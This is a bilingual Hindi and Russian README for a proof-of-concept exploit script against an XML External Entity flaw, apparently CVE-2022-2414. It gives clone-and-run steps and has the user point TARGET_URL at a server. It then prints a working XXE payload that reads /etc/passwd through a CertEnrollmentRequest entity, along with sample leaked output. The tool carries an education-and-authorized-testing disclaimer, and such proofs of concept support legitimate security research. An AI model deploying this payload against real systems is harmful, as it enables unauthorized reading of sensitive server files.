
एक PoC स्क्रिप्ट है जो XML External Entity (XXE) भेद्यता के शोषण का प्रदर्शन करने के लिए है।
GenXMLExternalEntityExploit एक PoC स्क्रिप्ट है जो XML External Entity (XXE) कमजोरियों के दोहन को प्रदर्शित करने के लिए है। यह स्क्रिप्ट लक्ष्य सर्वर से संवेदनशील फ़ाइलों को पढ़ने के लिए XML पेलोड का उपयोग करती है। यह सुरक्षा परीक्षण, पेनिट्रेशन परीक्षण या शैक्षिक उद्देश्यों के लिए उपयोगी हो सकता है।
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL वेरिएबल को अपडेट करें ताकि वह उस लक्ष्य सर्वर को इंगित करे जिसे आप परीक्षण करना चाहते हैं।XML_PAYLOAD स्ट्रिंग को अनुकूलित करें।डिफ़ॉल्ट रूप से, स्क्रिप्ट /etc/passwd फ़ाइल को पढ़ने के लिए निम्नलिखित पेलोड का उपयोग करती है:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। लेखक इस उपकरण के किसी भी अवैध उपयोग के लिए जिम्मेदार नहीं है।
GenXMLExternalEntityExploit — это PoC скрипт для демонстрации эксплуатации уязвимости XML External Entity (XXE). Скрипт использует XML-пейлоад для чтения конфиденциальных файлов с целевого сервера. Может использоваться для тестирования безопасности, проведения пентестов или в образовательных целях.
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL в скрипте на URL-адрес сервера, который вы хотите протестировать.XML_PAYLOAD для указания конкретных файлов или операций на стороне сервера.По умолчанию скрипт использует следующий пейлоад для чтения файла /etc/passwd:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
Этот инструмент предназначен исключительно для образовательных целей и тестирования безопасности с разрешения. Автор не несет ответственности за любое незаконное использование данного инструмента.